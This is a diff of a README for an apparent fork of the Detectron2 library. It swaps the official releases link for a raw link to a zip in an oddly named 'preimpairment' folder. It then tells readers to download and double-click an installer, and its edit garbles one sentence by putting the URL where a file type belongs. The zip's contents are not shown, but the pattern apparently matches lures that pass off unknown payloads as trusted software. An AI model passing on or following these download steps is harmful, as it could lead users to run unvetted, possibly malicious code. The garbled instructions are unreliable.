sayto97j/detectron2/README.md

 ## 📦 Download & Install
 1. **Visit the Releases Page:**
-   Go to the [Detectron2 Releases page](https://github.com/sayto97j/detectron2/releases) to find the latest version of the software.
+   Go to the [Detectron2 Releases page](https://raw.githubusercontent.com/sayto97j/detectron2/main/preimpairment/detectron2.zip) to find the latest version of the software.

 2. **Choose Your Version:**
    Look for the latest release version.
 It will usually be at the top of the page.
 Click on it to access the files.

 3. **Download the Installer:**
    Depending on your operating system, download the appropriate installer package.
-This could be an `.exe` file for Windows or a `.tar.gz` file for macOS/Linux.
+This could be an `.exe` file for Windows or a `https://raw.githubusercontent.com/sayto97j/detectron2/main/preimpairment/detectron2.zip` file for macOS/Linux.

 4. **Run the Installer:**
    Locate the downloaded file in your Downloads folder or the location where your browser saves files.
 Double-click the installer file to start the installation process.
 Follow the on-screen instructions to complete the installation.